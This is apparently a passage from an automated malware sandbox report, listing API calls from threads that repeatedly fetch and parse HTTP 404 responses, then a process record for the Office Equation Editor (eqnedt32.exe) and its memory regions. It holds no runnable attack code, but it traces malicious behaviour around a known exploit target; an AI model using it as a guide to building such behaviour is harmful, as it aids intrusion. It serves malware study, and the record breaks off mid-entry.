GetProcessHeap () returned 0x840000 [0329.769] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 257 os_tid = 0x1014 [0330.267] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0330.267] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:49 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0330.267] GetProcessHeap () returned 0x840000 [0330.267] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0330.267] GetProcessHeap () returned 0x840000 [0330.267] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0330.267] GetProcessHeap () returned 0x840000 [0330.267] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 258 os_tid = 0x109c [0330.801] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0330.801] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:49 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0330.801] GetProcessHeap () returned 0x840000 [0330.801] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0330.801] GetProcessHeap () returned 0x840000 [0330.801] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0330.801] GetProcessHeap () returned 0x840000 [0330.802] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 259 os_tid = 0xa8c [0331.332] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0331.332] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:50 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0331.332] GetProcessHeap () returned 0x840000 [0331.332] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0331.332] GetProcessHeap () returned 0x840000 [0331.332] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0331.332] GetProcessHeap () returned 0x840000 [0331.332] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 260 os_tid = 0x9ec [0331.831] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0331.831] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:51 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0331.831] GetProcessHeap () returned 0x840000 [0331.831] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0331.831] GetProcessHeap () returned 0x840000 [0331.832] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0331.832] GetProcessHeap () returned 0x840000 [0331.832] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 261 os_tid = 0xf1c [0332.355] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0332.355] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:51 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0332.355] GetProcessHeap () returned 0x840000 [0332.355] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0332.356] GetProcessHeap () returned 0x840000 [0332.356] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0332.356] GetProcessHeap () returned 0x840000 [0332.356] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 262 os_tid = 0x10d8 [0332.849] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0332.850] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:52 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0332.850] GetProcessHeap () returned 0x840000 [0332.850] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0332.850] GetProcessHeap () returned 0x840000 [0332.850] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0332.850] GetProcessHeap () returned 0x840000 [0332.850] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 263 os_tid = 0x320 [0333.346] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0333.347] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:52 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0333.347] GetProcessHeap () returned 0x840000 [0333.347] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0333.347] GetProcessHeap () returned 0x840000 [0333.347] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0333.347] GetProcessHeap () returned 0x840000 [0333.347] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 264 os_tid = 0x1074 [0333.866] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0333.867] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:53 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0333.867] GetProcessHeap () returned 0x840000 [0333.867] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0333.867] GetProcessHeap () returned 0x840000 [0333.867] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0333.867] GetProcessHeap () returned 0x840000 [0333.867] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Process: id = "4" image_name = "eqnedt32.exe" filename = "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\equation\\eqnedt32.exe" page_root = "0x649e4000" os_pid = "0x9d8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x274" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Office\\Root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\" -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1032 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1033 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1034 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1035 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1036 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1037 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1038 start_va = 0x400000 end_va = 0x48dfff monitored = 0 entry_point = 0x44cd40 region_type = mapped_file name = "eqnedt32.exe" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\EQUATION\\eqnedt32.exe" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\equation\\eqnedt32.exe") Region: id = 1039 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1040 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1041 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1042 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1043 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1044 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 1045 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1046 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1047 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1048 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 1049 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1050 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1051 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1052 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1053 start_va = 0x5b0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1054 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1055 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1056 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1057 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1058 start_va = 0x490000 end_va = 0x54dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1059 start_va = 0x550000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1060 start_va = 0x5b0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1061 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1062 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1063 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1064 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1065 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1066 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1067 start_va = 0x6c240000 end_va = 0x6c3f4fff monitored = 0 entry_point = 0x6c333d5a region_type = mapped_file name = "appvisvsubsystems32.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll") Region: id = 1068 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1069 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1070 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1071 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1072 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1073 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1074 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1075 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1076 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 1077 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1078 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1079 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1080 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1081 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1082 start_va = 0x6b470000 end_va = 0x6b4d4fff monitored = 0 entry_point = 0x6b48fa6c region_type = mapped_file name = "appvisvstream32.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll") Region: id = 1083 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1084 start_va = 0x67440000 end_va = 0x674d1fff monitored = 0 entry_point = 0x6744dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 1085 start_va = 0x6b230000 end_va = 0x6b2fafff monitored = 0 entry_point = 0x6b246a2b region_type = mapped_file name = "c2r32.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll") Region: id = 1086 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 1087 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1088 start_va = 0x70020000 end_va = 0x70038fff monitored = 0 entry_point = 0x700247e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1089 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1090 start_va = 0x6b0000 end_va = 0x6d9fff monitored = 0 entry_point = 0x6b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1091 start_va = 0x8a0000 end_va = 0xa27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 1092 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1093 start_va = 0xa30000 end_va = 0xbb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 1094 start_va = 0xbc0000 end_va = 0x1fbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bc0000" filename = "" Region: id = 1095 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1096 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1097 start_va = 0x590000 end_va = 0x590fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 1098 start_va = 0x6b0000 end_va = 0x740fff monitored = 0 entry_point = 0x6e8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1099 start_va = 0x6b0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 1100 start_va = 0x1fc0000 end_va = 0x20bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fc0000" filename = "" Region: id = 1101 start_va = 0x20c0000 end_va = 0x23f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1102 start_va = 0x6f0000 end_va = 0x6f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 1103 start_va = 0x700000 end_va = 0x710fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 1104 start_va = 0x6fff0000 end_va = 0x6fffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000006fff0000" filename = "" Region: id = 1105 start_va = 0x743f0000 end_va = 0x74481fff monitored = 0 entry_point = 0x74428cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1106 start_va = 0x5b0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1107 start_va = 0x2400000 end_va = 0x25dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 1108 start_va = 0x25e0000 end_va = 0x29dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1109 start_va = 0x68f30000 end_va = 0x692b8fff monitored = 0 entry_point = 0x68fccc60 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 1110 start_va = 0x550000 end_va = 0x551fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1111 start_va = 0x73c30000 end_va = 0x73c4afff monitored = 0 entry_point = 0x73c39050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1112 start_va = 0x6ead0000 end_va = 0x6ecdefff monitored = 0 entry_point = 0x6eb7b0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 1113 start_va = 0x560000 end_va = 0x560fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1114 start_va = 0x570000 end_va = 0x571fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1115 start_va = 0x3de20000 end_va = 0x3de2dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "eeintl.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\equation\\1033\\eeintl.dll") Region: id = 1116 start_va = 0x70040000 end_va = 0x700b4fff monitored = 0 entry_point = 0x70079a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1117 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 1118 start_va = 0x2570000 end_va = 0x257ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002570000" filename = "" Region: id = 1119 start_va = 0x25d0000 end_va = 0x25dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 1120 start_va = 0x74360000 end_va = 0x743e3fff monitored = 0 entry_point = 0x74386220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1121 start_va = 0x5b0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1122 start_va = 0x5f0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 1123 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1124 start_va = 0x640000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 1125 start_va = 0x1fc0000 end_va = 0x20bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fc0000" filename = "" Region: id = 1126 start_va = 0x2400000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 1127 start_va = 0x29e0000 end_va = 0x2adffff monitored = 1 entry_point = 0x0 